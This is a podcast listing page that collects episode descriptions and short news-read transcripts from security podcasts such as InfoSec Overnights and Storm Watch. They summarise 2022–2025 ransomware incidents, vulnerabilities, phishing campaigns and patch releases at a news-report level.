Podcasts about threatpost

  • 20 podcasts
  • 175 episodes
  • 20m average duration
  • Infrequent episodes
  • Latest episode: Feb 18, 2025

Popularity by year (chart, 2017 to 2024)



Latest podcast episodes about threatpost

Storm⚡️Watch by GreyNoise Intelligence
The Untold Stories: North Korean Hacks, Exploited Vulnerabilities & Cybersecurity Legends
Feb 18, 2025, 65:47


Forecast: Expect increased malicious activity targeting enterprise network infrastructure and remote work platforms.

In this episode of Storm⚡️Watch, the crew tackles some of the most pressing stories in cybersecurity and tech. First, we explore the case of Christian Marie Chapman, an Arizona woman who faces federal prison time for orchestrating a scheme that allowed North Korean IT workers to pose as U.S.-based employees. This operation, which generated over $17 million for North Korea, involved Chapman running a "laptop farm" that enabled remote access to U.S. company networks. The scheme not only compromised sensitive company data but also funneled money to North Korea's weapons programs. This story underscores the critical need for robust identity verification and background checks in hiring processes, especially in remote IT roles, to avoid inadvertently aiding malicious actors.

Next, we discuss GreyNoise's findings on the active exploitation of a high-severity vulnerability in Palo Alto Networks PAN-OS (CVE-2025-0108). This authentication bypass flaw allows attackers to execute unauthorized PHP scripts, posing significant risks to unpatched systems. Organizations are urged to apply security patches immediately and restrict access to firewall management interfaces to mitigate potential breaches. GreyNoise's real-time intelligence highlights the importance of staying vigilant against evolving threats.

In our featured segment, we sit down with Dennis Fisher, a celebrated journalist with over two decades of experience in cybersecurity reporting. Fisher shares insights from his career, including his work as co-founder of *Threatpost* and Editor-in-Chief at *Decipher*. Known for his analytical approach, Fisher has covered major cybersecurity events and delved into the motivations behind both attackers and defenders. His expertise offers a unique perspective on the complexities of information security.

Finally, we touch on broader issues in vulnerability management and encryption policies. From GreyNoise's observations of exploitation surges in vulnerabilities like ThinkPHP and ownCloud to Censys' argument against weakening encryption standards, these discussions emphasize the need for proactive measures and smarter prioritization in cybersecurity strategies. Whether it's patching overlooked vulnerabilities or resisting calls to weaken encryption under the guise of security, staying informed is key to navigating today's threat landscape.

The Threatpost Podcast
Inside the Hackers' Toolkit
Aug 9, 2022, 16:01


There is no question that companies are in the sights of would-be criminals looking to exploit them. While companies look at solutions and trainings to help keep the perimeter secure, the biggest fail point is often the employees, AKA the human element. In this Threatpost podcast, sponsored by Egress, we sit down with Jack Chapman to discuss the steps and tactics that companies can take to stay one step ahead of their adversaries. During our conversation, we discuss:

  • Weaknesses that attackers look to exploit
  • Evolution of toolkits
  • Securing MFA
  • and more

InfoSec Overnights - Daily Security News
WordFly Breach, Now IIS See You, No Knock Nuki, and more.
Jul 28, 2022, 2:54


A daily look at the relevant information security news from overnight - 27 July, 2022

Episode 274 - 27 July 2022

  • WordFly Breach - https://www.securityweek.com/mailing-list-provider-wordfly-scrambling-recover-following-ransomware-attack
  • Now IIS See You - https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-increasingly-hacked-with-iis-backdoors/
  • Messaging Threats - https://threatpost.com/messaging-apps-cybercriminals/180303/
  • Robin Banks Phishing Service - https://www.bleepingcomputer.com/news/security/new-robin-banks-phishing-service-targets-bofa-citi-and-wells-fargo/
  • No Knock Nuki - https://www.securityweek.com/nuki-smart-lock-vulnerabilities-allow-hackers-open-doors

Hi, I'm Paul Torgersen. It's Wednesday July 27th, 2022, and this is a look at the information security news from overnight.

From SecurityWeek.com: Mailing list provider WordFly has been offline for more than two weeks after a ransomware attack encrypted data on some of its systems. The attack hit on July 10, and the company hasn't been able to restore service since. The company confirms data was exfiltrated, but believes it was subsequently deleted. They expect to be down at least another few days before they get systems operational again. No word on the malware or threat actor.

From BleepingComputer.com: Attackers are increasingly using Internet Information Services, IIS, web server extensions to backdoor unpatched Exchange servers. Being installed in the exact location and using the same structure as legitimate modules, they provide attackers with a perfect and durable persistence mechanism. Details and a link to the Microsoft report in the article.

From ThreatPost.com: Threat actors are tapping the multi-feature nature of messaging apps such as Telegram and Discord as a foundation in persistent campaigns that threaten users. Intel 471 identified three key ways in which threat actors are leveraging the apps: storing stolen data, hosting malware payloads, and using bots that perform the dirty work. Details and a link inside.

From BleepingComputer.com: A new phishing-as-a-service platform has shown up with the name Robin Banks. As you may have guessed, it offers ready-made phishing kits targeting the customers of well-known banks. Companies like Citibank, Bank of America, Capital One, Wells Fargo, etc. Oh, they also offer templates to steal Microsoft, Google, Netflix, and T-Mobile accounts. Pricing from $50 to $200 a month.

And last, from SecurityWeek.com: Security researchers have documented 11 vulnerabilities impacting Nuki smart lock products, you may not be able to see my air quotes. Nuki Smart Lock and Nuki Bridge allow users to unlock their doors with their smartphones by simply walking in range. Brilliant. Exploiting the found vulnerabilities could result in a fully compromised device, including the ability to open and close the door without the owner even noticing. After being notified of the flaws in April, Nuki has issued patches this month.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

InfoSec Overnights - Daily Security News
Drupal Updates, Zyxel Firewall Patches, Candiru's DevilsTongue, and more.
Jul 22, 2022, 3:03


A daily look at the relevant information security news from overnight - 22 July, 2022

Episode 271 - 22 July 2022

  • Drupal Updates - https://www.securityweek.com/code-execution-and-other-vulnerabilities-patched-drupal
  • Zyxel Firewall Patches - https://portswigger.net/daily-swig/zyxel-firewall-vulnerabilities-left-business-networks-open-to-abuse
  • PayPal Double Spear Phishing - https://www.infosecurity-magazine.com/news/paypal-used-send-malicious-double/
  • Okta Too Open - https://threatpost.com/risks-okta-sso/180249/
  • Candiru's DevilsTongue - https://www.bleepingcomputer.com/news/security/chrome-zero-day-used-to-infect-journalists-with-candiru-spyware/

Hi, I'm Paul Torgersen. It's Friday July 22nd, 2022, and from Victoria one last time, this is a look at the information security news from overnight.

From SecurityWeek.com: Drupal has released patches for four vulnerabilities. The most critical flaw affects Drupal 9.3 and 9.4, and it can lead to arbitrary PHP code execution on Apache web servers. The other three vulnerabilities also impact the Drupal core and can lead to cross-site scripting attacks, information disclosure, or access bypass. Get your patch on kids.

From PortSwigger.net: Zyxel has released patches for several of its firewall products following the discovery of two security vulnerabilities that left business networks open to exploitation. One is an authenticated directory traversal vulnerability in the Common Gateway Interface, and the other is a local privilege escalation vulnerability that was identified in the command-line interface. You should update to the latest versions as soon as you can.

From Infosecurity-Magazine.com: Threat actors are using PayPal to send out phishing invoices. PayPal domains are usually "allow-listed" by organizations' email filters, so cyber-criminals are registering accounts and composing malicious invoices on the platform. Many are spoofing Norton products, but substituting their own information for payments. They even have someone answering the included Customer Service number to continue the charade to extract dollars from their victims.

From ThreatPost.com: Four newly discovered attack paths in the products for IAM vendor Okta could lead to PII exposure, account takeover, or even organizational data destruction. Note that the researchers call these "attack paths" and not vulnerabilities. Okta says this is a non-issue and all you need to do is tweak up your security profile a little, which is beyond what they offer as their default settings. You can see the details in the article.

And last, from BleepingComputer.com: The Israeli spyware vendor Candiru was found using a Google Chrome zero day to spy on journalists and other high-interest individuals in the Middle East with their 'DevilsTongue' spyware. Threat researchers from Avast, who discovered the vulnerability and reported it to Google, revealed that they unearthed the flaw after investigating spyware attacks on their clients. The vuln was patched on July 4. Details and a link to the research in the article.

That's all for me today. Have a great rest of your day. Like and subscribe, and until next time, be safe out there.

InfoSec Overnights - Daily Security News
Knauf Knocked Out, Rusty Luna, Magecart Skim, and more.
Jul 20, 2022, 3:03


A daily look at the relevant information security news from overnight - 20 July, 2022

Episode 269 - 20 July 2022

  • Knauf Knocked Out - https://www.bleepingcomputer.com/news/security/building-materials-giant-knauf-hit-by-black-basta-ransomware-gang/
  • Rusty Luna - https://thehackernews.com/2022/07/new-rust-based-ransomware-family.html
  • GPS Over-Tracking - https://www.zdnet.com/article/flaws-in-a-popular-gps-tracker-could-allow-hackers-to-track-or-stop-vehicles-say-security-researchers/
  • Oracle Patchfest - https://www.securityweek.com/oracle-releases-349-new-security-patches-july-2022-cpu
  • Magecart Skim - https://docs.google.com/document/d/1Kse6lMi7hJEg1wDnVS_ZEND2pZOEMT4a9We3erCPsXE/edit

Hi, I'm Paul Torgersen. It's Wednesday July 20th, 2022, and from Victoria, this is a look at the information security news from overnight.

From BleepingComputer.com: The Knauf Group, a large Germany-based building materials company, has announced it has been the target of a cyberattack that has disrupted its business operations. Their global IT team has shut down all systems to isolate the incident. Knauf has not confirmed it is a ransomware attack, but the Black Basta group has claimed responsibility for the attack on their extortion site. So far they claim to have released about 20% of the information they stole, which indicates they are likely still hopeful to receive a ransom from the victim.

From TheHackerNews.com: Researchers have disclosed a brand-new ransomware family written in Rust, which Kaspersky Labs has named Luna. The ransomware is fairly simple and appears to be in its early development. It is designed to be used by Russian-speaking threat actors, and can run on Windows, Linux, and ESXi systems.

From ZDNet.com: Critical security vulnerabilities in the MiCODUS MV720 vehicle GPS tracker could be used to remotely track, stop or even take control of vehicles in which it is installed. These devices are popular with large companies and government entities, with approximately 1.5 million of them currently in use in 169 countries. Researchers at BitSight, who found the flaws, say these devices should not be used until patches are available. No word from MiCODUS on when that might be.

From SecurityWeek.com: Oracle's quarterly Critical Patch Update has a total of 349 new security patches, including 230 for vulnerabilities that can be exploited by remote, unauthenticated attackers. 64 of the vulnerabilities are rated critical, with four of those scoring a ten out of ten. Financial Services Applications received the largest number of fixes, followed by Oracle Communications, then Fusion Middleware. Get your patch on kids.

And last today, from ThreatPost.com: A Magecart campaign has been skimming payment-card credentials from customers using three online restaurant-ordering systems. The attack has affected over 300 restaurants and compromised at least 50,000 cards so far, which have already been offered up for sale on the dark web. The platforms impacted are MenuDrive, Harbortouch, and InTouchPOS.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

InfoSec Overnights - Daily Security News
Qakbot Glows Up, AiTM Phishing, Luna Moth Flutters In, and more.
Jul 13, 2022, 3:06


A daily look at the relevant information security news from overnight - 13 July, 2022

Episode 264 - 13 July 2022

  • Qakbot Glows Up - https://thehackernews.com/2022/07/researchers-uncover-new-attempts-by.html
  • AiTM Phishing - https://threatpost.com/large-scale-hishing-bypasses-mfa/180212/
  • Lenovo Firmware Flaw - https://thehackernews.com/2022/07/new-uefi-firmware-vulnerabilities.html
  • Microsoft Patches Zero Day - https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2022-patch-tuesday-fixes-exploited-zero-day-84-flaws/
  • Luna Moth Flutters In - https://www.bleepingcomputer.com/news/security/new-luna-moth-hackers-breach-orgs-via-fake-subscription-renewals/

Hi, I'm Paul Torgersen. It's Wednesday July 13th, 2022, and this is a look at the information security news from overnight.

From TheHackerNews.com: Researchers at Zscaler have found that the operators behind the Qakbot malware are trying to sidestep detection by altering their delivery vectors. Most recently by using ZIP file extensions, code obfuscation, utilizing multiple URLs, and using unknown file extensions such as .OCX, .ooccxx, .gyp, etc. Looks like this little workhorse just won't go away. A link to that research in the article.

From ThreatPost.com: Microsoft has uncovered a massive phishing campaign that can steal credentials even if you have multi-factor authentication enabled. The campaign uses adversary-in-the-middle phishing sites to hijack session cookies so the attacker gets authenticated to a session on the user's behalf regardless of the sign-in method used. The ultimate goal seems to be payment fraud through Business Email Compromise attacks, and it has targeted over 10,000 organizations to date. Details in the article.

From TheHackerNews.com: Lenovo rolled out fixes for three security flaws in its UEFI firmware affecting over 70 product models. The vulnerabilities can be exploited to achieve arbitrary code execution in the early phases of the platform boot. All three bugs relate to buffer overflow vulnerabilities. Lenovo had to patch three UEFI vulnerabilities earlier this year as well.

From BleepingComputer.com: Microsoft's July Patch Tuesday included fixes for 84 total vulnerabilities. Four of those were critical, one of which was a zero day being actively exploited in the wild. That one could gain an attacker SYSTEM privileges, but no attack details were provided. This is in addition to fixes rolled out from SAP, Siemens, Schneider and others. Get your patch on kids.

And last today, also from BleepingComputer.com: A new data extortion group has been trying to breach companies to steal confidential information. The group, called Luna Moth, has been active since at least March with phishing campaigns that claim to be subscription renewal invoices, but really deliver remote access tools. The emails spoof the relevant brand, but actually all come from Gmail accounts. The techniques and tools used indicate these guys are not very sophisticated. On the other hand, sometimes our users are not very sophisticated, so better to be aware.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

Paul's Security Weekly
BSW #266 - John Bruggeman & Brandon Dunlap
Jul 11, 2022, 55:30


What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this week's episode.

Segment Resources:
  • https://www.cbts.com/security/security-services/
  • https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/
  • https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/
  • https://www.cbts.com/blog/what-is-cyber-insurance/

With recent proposed rule making from the SEC, there is increased focus on the Board's involvement in governing and managing cybersecurity. What is changing in how effective CISOs engage with their Board of Directors, and what is over the horizon for cybersecurity leaders?

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly

Show Notes: https://securityweekly.com/bsw266

Business Security Weekly (Audio)
BSW #266 - John Bruggeman & Brandon Dunlap
Jul 11, 2022, 55:30


What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this week's episode.

Segment Resources:
  • https://www.cbts.com/security/security-services/
  • https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/
  • https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/
  • https://www.cbts.com/blog/what-is-cyber-insurance/

With recent proposed rule making from the SEC, there is increased focus on the Board's involvement in governing and managing cybersecurity. What is changing in how effective CISOs engage with their Board of Directors, and what is over the horizon for cybersecurity leaders?

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly

Show Notes: https://securityweekly.com/bsw266

InfoSec Overnights - Daily Security News
WeWork Exposure, Django Injection, Google Zero-Day Patch, and more.
Jul 5, 2022, 2:42


A daily look at the relevant information security news from overnight - 05 July, 2022

Episode 258 - 05 July 2022

  • WeWork Exposure - https://techcrunch.com/2022/07/04/wework-exposed-visitors-data/
  • Django Injection - https://www.bleepingcomputer.com/news/security/django-fixes-sql-injection-vulnerability-in-new-releases/
  • AstraLocker Expires - https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/
  • Google to Delete Sensitive Tracking - https://www.infosecurity-magazine.com/news/british-army-social-media-accounts/
  • Google Zero-Day Patch - https://threatpost.com/actively-exploited-chrome-bug/180118/

Hi, I'm Paul Torgersen. It's Tuesday July 5th, 2022, and this is a look at the information security news from overnight.

From TechCrunch.com: WeWork India had a security lapse that exposed the personal information and selfies of tens of thousands of people who used the WeWork coworking spaces in the country. The bug made it possible to access the check-in record of any visitor by manually typing in a check-in ID, with no safeguards against accessing the data in bulk. The company is fixing the issue.

From BleepingComputer.com: Django, an open source Python-based web framework, has patched a high-severity SQL injection vulnerability. The flaw affects Django's main branch, and versions 4.1 (currently in beta), 4.0, and 3.2. Developers are urged to upgrade to Django versions 4.0.6 and 3.2.14 as soon as possible.

Also from BleepingComputer.com: The threat actor behind the AstraLocker ransomware says they're shutting down the operation and plan to switch to cryptojacking. The ransomware's developer even submitted a ZIP archive with the AstraLocker decryptors to VirusTotal. The decryptors appear to be legit and worked on the one sample the team at BleepingComputer tried out. Details and a link to that zip file in the article.

From ZDNet.com: Google says it will automatically wipe user location history for visits to healthcare clinics, including abortion and fertility clinics, domestic abuse shelters, and other sensitive areas. The fear is that, in a post-Roe world, this location tracking data could be used in persecutions, excuse me, prosecutions. These changes will be rolling out in the coming weeks.

And last today, from ThreatPost.com: Google quietly rolled out a stable channel update for Chrome to patch an actively exploited zero-day vulnerability. This is the fourth such flaw the vendor has had to patch so far this year. The bug is a buffer overflow that was just reported on July 1. The company also tidied up a few other bugs while it was at it.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

InfoSec Overnights - Daily Security News
Russian Bears, Auto Supplier Hosed, Parse Bug No Game, and more.
Jun 23, 2022, 3:09


A daily look at the relevant information security news from overnight - 23 June, 2022

Episode 251 - 23 June 2022

  • Russian Bears - https://threatpost.com/fancy-bear-nuke-threat-lure/180056/
  • Auto Supplier Hosed - https://www.reuters.com/technology/japanese-automotive-hose-maker-nichirin-hit-by-ransomware-attack-2022-06-22/
  • NIMble Trooper - https://thehackernews.com/2022/06/chinese-hackers-distributing-sms-bomber.html
  • SMA UNIX Root - https://www.securityweek.com/sma-technologies-patches-critical-security-issue-workload-automation-solution
  • Parse Bug No Game - https://portswigger.net/daily-swig/severe-parse-server-bug-impacts-apple-game-center

Hi, I'm Paul Torgersen. It's Thursday June 23rd, 2022, and from Chicago's O'Hare airport, this is a look at the information security news from overnight.

From ThreatPost.com: Russian APT group Fancy Bear is targeting Ukrainians with a phishing campaign that uses the threat of nuclear war to exploit the Microsoft Follina vulnerability. The goal is to deliver a .Net stealer that can nab credentials from the Chrome, Firefox and Edge browsers. The group is strongly believed to be working at the behest of Russian Intelligence.

From Reuters.com: Japanese automotive hose maker Nichirin said that a U.S. subsidiary had been hit by a ransomware attack that has forced it to entirely shut down its computerized production controls. The company has switched to manual production and shipping in order to keep parts flowing to customers. No word on the threat actor or malware strain.

From TheHackerNews.com: A threat cluster out of China with ties to a hacking group called Tropic Trooper has been spotted using a previously undocumented malware coded in the Nim language. The novel loader, dubbed Nimbda, is bundled with a Chinese language 'SMS Bomber' tool that is most likely illegally distributed in the Chinese-speaking web. The Nim loader has the same executable icon as the SMS Bomber, so the entire bundle works as a trojanized binary. More details in the article.

From SecurityWeek.com: A critical vulnerability in the SMA Technologies OpCon UNIX agent results in the same SSH key being deployed with all installations. The installation files also include a corresponding, unencrypted private key named "sma_id_rsa." An attacker with access to that key can gain SSH access as root on affected systems. The key even remains on the system after the OpCon software has been removed. Details and a link to the advisory in the article.

And last today, from PortSwigger.net: A vulnerability in Parse Server software has led to the discovery of an authentication bypass impacting Apple Game Center. Exploitation of this 8.6 severity bug could result in authentication being bypassed by making a fake certificate accessible via certain Apple domains and providing the URL to that certificate in an authData object. Attack complexity is considered low and no privileges are required. A fix has been issued, so get your patch on kids.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

Paul's Security Weekly TV
Inside the CISO's Office - John Bruggeman - BSW #266
Jun 18, 2022, 30:30


What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this week's episode.

Segment Resources:
  • https://www.cbts.com/security/security-services/
  • https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/
  • https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/
  • https://www.cbts.com/blog/what-is-cyber-insurance/

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Show Notes: https://securityweekly.com/bsw266


Business Security Weekly (Video)
Inside the CISO's Office - John Bruggeman - BSW #266
Jun 17, 2022, 30:30


What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this week's episode.

Segment Resources:
  • https://www.cbts.com/security/security-services/
  • https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/
  • https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/
  • https://www.cbts.com/blog/what-is-cyber-insurance/

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Show Notes: https://securityweekly.com/bsw266


InfoSec Overnights - Daily Security News
Hello XD upgrades, Conti targets Intel, Sentient AI?, and more.
Jun 13, 2022, 3:42


A daily look at the relevant information security news from overnight - 13 June, 2022

Episode 243 - 13 June 2022

  • Hello XD upgrades - https://www.bleepingcomputer.com/news/security/hello-xd-ransomware-now-drops-a-backdoor-while-encrypting/
  • Conti targets Intel - https://www.cpomagazine.com/cyber-security/conti-ransomware-develops-proof-of-concept-code-for-firmware-attacks/
  • WannaFriendMe out of the Blox - https://www.techradar.com/news/this-ransomware-can-only-be-decrypted-by-going-to-the-roblox-store
  • Web3 Wallet seed stealer - https://www.securityweek.com/chinese-hackers-adding-backdoor-ios-android-web3-wallets-seaflower-campaign
  • Bluetooth fingerprint - https://threatpost.com/bluetooth-signals-track-smartphones/179937/
  • Sentient AI? - https://www.theregister.com/2022/06/13/google_lamda_sentient_claims/

Hi, I'm Paul Torgersen. It's Monday June 13th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: Researchers report increased activity of the Hello XD ransomware, which is based on the leaked source code of Babuk, with two significant notes. One is that the operators are now deploying an upgraded sample featuring stronger encryption that includes custom packing for detection avoidance and encryption algorithm changes. And two, they are now including an open-source backdoor named MicroBackdoor. Lots of details in the article.

From CPOMagazine.com: An analysis of leaked chats from the Conti ransomware group has found two items of note. Evidently the cybercrime group was planning firmware attacks targeting the Intel Management Engine. Such a compromise would allow threat actors to introduce a backdoor on Intel devices and execute commands without detection by OS-based security tools. The other interesting piece is that the chat logs seem to confirm a link between the Conti group and the Russian Foreign Services Bureau. Color me not surprised.

From TechRadar.com: A new ransomware group called WannaFriendMe is targeting gamers with the Chaos ransomware, which tries to pass itself off as Ryuk. The strange thing is, the decryptor is so easy, my kid can get it. I only say that because to get the decryptor, you need to log into a Roblox account and buy a specific game pass. Costs about $20.

From SecurityWeek.com: Cybercriminals likely operating out of China are distributing backdoored versions of iOS and Android Web3 wallets in an effort to steal users' seed phrases. This previously unreported campaign, dubbed SeaFlower, has been described as one of the most technically sophisticated threats targeting users of Web3 wallets ever seen. Details in the article.

From ThreatPost.com: Researchers warn Bluetooth signals can be used to track device owners via a unique fingerprinting of the radio signal. Their paper suggests that minor manufacturing imperfections in hardware are unique to each device, and cause measurable distortions which can be used as basically a fingerprint to track a specific device. Details and a link to the research in the article.

And last today, from TheRegister.com: You ever see the movie Her? Well, since 2021, Google's Responsible AI team has been tasked with talking to LaMDA, or Language Model for Dialogue Applications. This project was built by fine-tuning a family of Transformer-based neural language models specialized for dialog, with up to 137 billion model parameters. Someone on that team has recently been placed on paid administrative leave for violating Google's confidentiality policies. This person has gone on record stating that they believe the application has exhibited self-awareness and is now a sentient being.

That is quite enough from me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

InfoSec Overnights - Daily Security News
WhatsApp hack, Sowing Discord, Horde zero-day, and more.
Jun 2, 2022, 3:06


A daily look at the relevant information security news from overnight - 02 June, 2022

Episode 236 - 02 June 2022

  • WhatsApp hack - https://www.bleepingcomputer.com/news/security/hackers-steal-whatsapp-accounts-using-call-forwarding-trick/
  • Sowing Discord - https://threatpost.com/scammers-target-nft-discord-channel/179827/
  • New Windows zero-day - https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/
  • Elasticsearch snatched - https://www.securityweek.com/cybercriminals-hold-1200-unsecured-elasticsearch-databases-ransom
  • Horde zero-day - https://portswigger.net/daily-swig/horde-webmail-contains-zero-day-rce-bug-with-no-patch-on-the-horizon

Hi, I'm Paul Torgersen. It's Thursday June 2nd, 2022. I think I said yesterday was Tuesday, and Tuesday was Monday. Obviously my brain is not comprehending the holiday very well. Anyway, this is a look at the information security news from overnight.

From BleepingComputer.com: Hackers are going after WhatsApp accounts to gain access to personal messages and contact lists. The method relies on the mobile carriers' automated service to forward calls to a different phone number, and WhatsApp's option to send a one-time password verification code via voice call. You can pursue all the details in the article.

From ThreatPost.com: Hackers are escalating phishing and scamming attacks targeting NFT servers to exploit a popular Discord bot and persuade users to click on the malicious links. The Discord bot mee6, which is used to automate welcome messages and inform visitors about the server rules, etc., seems to be compromised across several high profile servers. As always, when in doubt, don't click the link.

From BleepingComputer.com: A new Windows Search zero-day vulnerability can be used to automatically open a search window containing malware executables simply by launching a Word document. This error stems from Windows support of a URI protocol handler called 'search-ms' that allows applications and HTML links to launch customized searches on a device. Details in the article.

From SecurityWeek.com: Over 1,200 Elasticsearch databases that could be accessed without authentication have fallen victim to a ransomware attacker, which replaced their indexes with a note demanding a payment of 0.012 Bitcoin in exchange for their data. In each case, data held in the databases was replaced with a ransom note stored in the 'message' field of an index called 'read_me_to_recover_database'. Inside the 'email' field is a contact email address. The article has a link to the full Secureworks write up.

And last today, from PortSwigger.net: A zero-day vulnerability in Horde Webmail enables attackers to execute arbitrary code on the underlying server. Going from bad to worse, Horde has already flagged this version of their webmail to be their final release, so it is likely that a patch will not be forthcoming.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

The Threatpost Podcast
Being prepared for adversarial attacks

The Threatpost Podcast

Play Episode Listen Later Jun 2, 2022 22:10


There is no question that the level of threats facing today's businesses continues to change on a daily basis. So what are the trends that CISOs need to be on the lookout for? For this episode of the Threatpost podcast, I am joined by Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, Fortinet's FortiGuard Labs, to discuss the threats facing CISOs along with more. During the course of our discussion, we dive into:

- What an attack on all fronts looks like
- The current state of the threat landscape
- New techniques being leveraged by adversaries
- The automation of threats

We also lay out what CISOs need to consider when laying out and producing their threat action plan.

InfoSec Overnights - Daily Security News
Word backdoor, WSL Attack surface, EnemyBot adapting, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 31, 2022 2:53


A daily look at the relevant information security news from overnight.

Episode 234 - 27 May 2022

Word backdoor - https://www.zdnet.com/article/this-zero-day-windows-flaw-opens-a-backdoor-to-hackers-via-microsoft-word-heres-how-to-fix-it/
WSL attack surface - https://www.bleepingcomputer.com/news/security/new-windows-subsystem-for-linux-malware-steals-browser-auth-cookies/
Killnet warns Italy - https://www.thesundaily.my/world/italy-on-alert-over-killnet-cyber-attack-threat-DA9266005
Spirit Super suckered - https://portswigger.net/daily-swig/data-breach-at-australian-pension-provider-spirit-super-impacts-50k-victims-following-phishing-attack
EnemyBot adapting - https://threatpost.com/enemybot-malware-targets-web-servers-cms-tools-and-android-os/179765/

Hi, I'm Paul Torgersen. It's Monday May 31st, 2022, and this is a look at the information security news from overnight.

From ZDNet.com: Security researchers discovered a zero-day flaw called Follina that enables a malicious Word document to execute code via the Microsoft Support Diagnostic Tool, even when macros are disabled. There is no patch yet. For mitigation, Microsoft recommends disabling a protocol used for troubleshooting Windows bugs. Details and links in the article.

From BleepingComputer.com: Hackers are showing an increased interest in the Windows Subsystem for Linux, or WSL, as an attack surface for new malware. Some of the more advanced samples are suitable for espionage and downloading additional modules. After the first malicious Linux binary for WSL was discovered just over a year ago, Black Lotus Labs says that since last fall, they have tracked more than 100 samples of WSL-based malware.

From TheSunDaily.my: Italy is on high alert after the pro-Russian 'Killnet' hacker group said it would launch a cyber attack that would inflict "irreparable" damage on the country. Killnet has staged several attacks on Italian public institutions in recent weeks, including on the websites of the Senate and the defense ministry. All this in response to Italy backing Western sanctions on Russia following its invasion of Ukraine.

From PortSwigger.net: A phishing attack on Australian pension provider Spirit Super has resulted in PII being leaked on some 50,000 customers. The personal data includes names and other sensitive information, but according to the company, does not include birthday, tax ID or driver's license numbers, or bank account details.

And last today, from ThreatPost.com: A rapidly evolving IoT malware dubbed EnemyBot is targeting content management systems, web servers and Android devices, taking advantage of recently disclosed vulnerabilities in VMware, Adobe, WordPress and others. The threat actor group Keksec is believed to be behind the distribution of the malware, which borrows code heavily from other botnets, such as Mirai, Qbot and Zbot. Details in the article.

That's all for me today. Have a great rest of your day. And until tomorrow, be safe out there.

InfoSec Overnights - Daily Security News
Buggy Android apps, Guzzle cookies crumble, New Windows update not Trend-y, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 27, 2022 3:39


A daily look at the relevant information security news from overnight.

Episode 234 - 27 May 2022

Buggy Android apps - https://www.bleepingcomputer.com/news/security/microsoft-finds-severe-bugs-in-android-apps-from-large-mobile-providers/
Guzzle cookies crumble - https://portswigger.net/daily-swig/patch-released-for-cross-domain-cookie-leakage-flaw-in-guzzle
Ransom besets Somerset - https://www.cnn.com/2022/05/26/politics/new-jersey-somerset-county-ransomware-attack/index.html
BlackCat slashes Austria - https://www.bleepingcomputer.com/news/security/blackcat-alphv-ransomware-asks-5-million-to-unlock-austrian-state/
Critical OAS flaws - https://threatpost.com/critical-flaws-in-popular-ics-platform-can-trigger-rce/179750/
New Windows update not Trend-y - https://www.bleepingcomputer.com/news/security/windows-11-kb5014019-breaks-trend-micro-ransomware-protection/

Hi, I'm Paul Torgersen. It's Friday May 27th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: Microsoft security researchers have found high severity vulnerabilities in a framework owned by MCE Systems that is used by Android apps. The vulnerabilities expose users to command injection and privilege escalation attacks. The apps have millions of downloads on Google's Play Store and come pre-installed as system applications on devices bought from operators including AT&T, TELUS, Rogers Communications, Bell Canada, and Freedom Mobile. Patches have been issued.

From PortSwigger.net: Guzzle, the popular HTTP client for PHP applications, has addressed a high severity vulnerability leading to cross-domain cookie leakage. The flaw resides in Guzzle's cookie middleware, which is fortunately disabled by default, so most library consumers will not be affected. Drupal is one of the applications that use the third-party library and has released updates to address the issue.

From CNN.com: A ransomware attack has forced officials in Somerset County, New Jersey, to switch off their computers and set up temporary Gmail accounts so the public can communicate with key agencies like health, emergency and sheriff's departments. The county says the attack has only affected email and IT systems and that phone lines and emergency service systems are all working properly. No word on the threat actor or specific malware involved.

From BleepingComputer.com: The Austrian state of Carinthia has been hit by the BlackCat ransomware gang, who demanded $5 million to unlock their encrypted computer systems. Evidently thousands of workstations have been locked by the attack. The government says there is no evidence that BlackCat actually managed to exfiltrate any data, and that the plan is to restore the machines from backups.

From ThreatPost.com: Multiple flaws have been found in Open Automation Software, a popular platform used by industrial control systems. The two critical and five high severity vulnerabilities could allow unauthorized device access, remote code execution, or denial of service that could ultimately threaten the stability of critical infrastructure. The flaws affect OAS Platform version 16.00.0112. See the full Cisco Talos report in the article.

